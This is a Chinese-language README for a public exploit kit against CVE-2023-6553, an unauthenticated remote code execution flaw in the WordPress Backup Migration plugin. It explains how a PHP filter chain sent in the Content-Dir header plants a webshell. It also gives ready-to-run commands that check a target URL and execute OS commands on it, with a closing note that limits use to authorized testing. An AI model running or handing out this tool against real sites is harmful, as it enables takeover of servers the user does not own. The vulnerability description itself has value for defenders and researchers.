
WordPress 的 Backup Migration 插件在所有版本(包括 1.3.7)中,通过 /includes/backup-heart.php 文件存在远程代码执行漏洞。
| 属性 | 详情 |
|---|
| CVE ID | CVE-2023-6553 |
| CVSS 分数 | 9.8 / 10 — 严重 |
| CVSS 向量 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-94 — 代码生成控制不当 |
| 受影响插件 | Backup Migration(别名:backup-backup) |
| 受影响版本 | ≤ 1.3.7 |
| 认证要求 | 无需认证(未授权) |
| 发现者 | Wordfence |
WordPress 的 Backup Migration 插件在包括 1.3.7 在内的所有版本中均存在 远程代码执行 漏洞,漏洞位于 /includes/backup-heart.php 文件中。
该漏洞的存在是因为攻击者可以通过 Content-Dir HTTP 标头控制传递给 PHP include 语句的值。通过利用 PHP filter chain,攻击者可以在未认证的情况下注入任意 PHP 代码,从而在服务器上实现完全远程代码执行。
┌──────────┐ Content-Dir 标头 ┌──────────────────────┐ include() ┌──────────┐
│ 攻击者 │ ──── PHP Filter Chain ──▶│ backup-heart.php │ ──────────────▶ │ RCE │
│ │ (无需认证) │ (漏洞文件) │ │ 主机上 │
└──────────┘ └──────────────────────┘ └──────────┘
readme.txt 检测已安装的插件版本Content-Dir 标头发送到漏洞端点.
├── exploit.py # 🎯 简洁、专业的漏洞利用工具(支持详细模式)
├── fancy_exploit.py # ✨ 花俏版本——相同的利用,更好的视觉效果
├── php_filter_chain.py # 🔗 PHP filter chain 生成器模块
└── README.md # 📖 你当前所在位置
exploit.py — 专业版利用工具主要、简洁的漏洞利用脚本,专为安全评估和案例分析中的专业用途而设计。特点包括:
-v)用于输出详细操作信息-C)fancy_exploit.py — 花俏版 ✨同一漏洞利用工具的更具表现力的版本,带有更多个性。功能上与 exploit.py 完全相同,但呈现方式更丰富多彩:
注意: 两个脚本共享完全相同的攻击逻辑——
fancy_exploit.py只是在更富视觉表现力的输出层上包装了体验。
pip 包管理器# 克隆仓库
git clone https://github.com/<你的用户名>/CVE-2023-6553.git
cd CVE-2023-6553
# 安装依赖
pip install -r requirements.txt
注意:
php_filter_chain.py是仓库中包含的本地模块,无需额外安装。
exploit.py
# 检查目标是否易受攻击(仅侦察)
python3 exploit.py -u http://目标.com -C
# 利用漏洞并执行命令
python3 exploit.py -u http://目标.com -c id
# 先检查漏洞,再利用
python3 exploit.py -u http://目标.com -C -c whoami
# 详细模式输出详细信息
python3 exploit.py -u http://目标.com -c id -v
fancy_exploit.py
# 检查目标是否易受攻击
python3 fancy_exploit.py -u http://目标.com -C
# 利用漏洞并执行命令
python3 fancy_exploit.py -u http://目标.com -c id
# 先检查,如果存在漏洞则利用
python3 fancy_exploit.py -u http://目标.com -C -c whoami
| 参数 | 描述 |
|---|---|
-u, --url | (必填) 目标 WordPress URL |
-c, --command | 利用后要执行的 OS 命令 |
-C, --check | 仅检查漏洞状态,不进行利用 |
-v, --verbose | 启用详细输出 (仅 exploit.py 支持) |
| 阶段 | 名称 | 描述 |
|---|---|---|
| 1 | 🔍 侦察 | 获取 readme.txt 以检测已安装的插件版本 |
| 2 | 🧪 载荷生成 | 构建一个可解码为 webshell 释放器的 PHP filter chain |
| 3 | 💣 漏洞传输 | 通过 Content-Dir 标头将载荷发送到 backup-heart.php |
| 4 | 🚀 命令执行 | 使用指定的 OS 命令触发已部署的 webshell |
Content-Dir 标头此工具仅供授权安全测试和教育目的使用。
未经授权访问计算机系统违反包括《计算机欺诈和滥用法案》(CFAA)、《计算机滥用法案》以及世界各地的类似法律。作者对此软件的滥用 不承担任何责任。
仅在你 拥有 或已获得 明确书面授权 的系统中使用此工具。
作者: Phantom Hat
仅用于授权渗透测试和安全研究。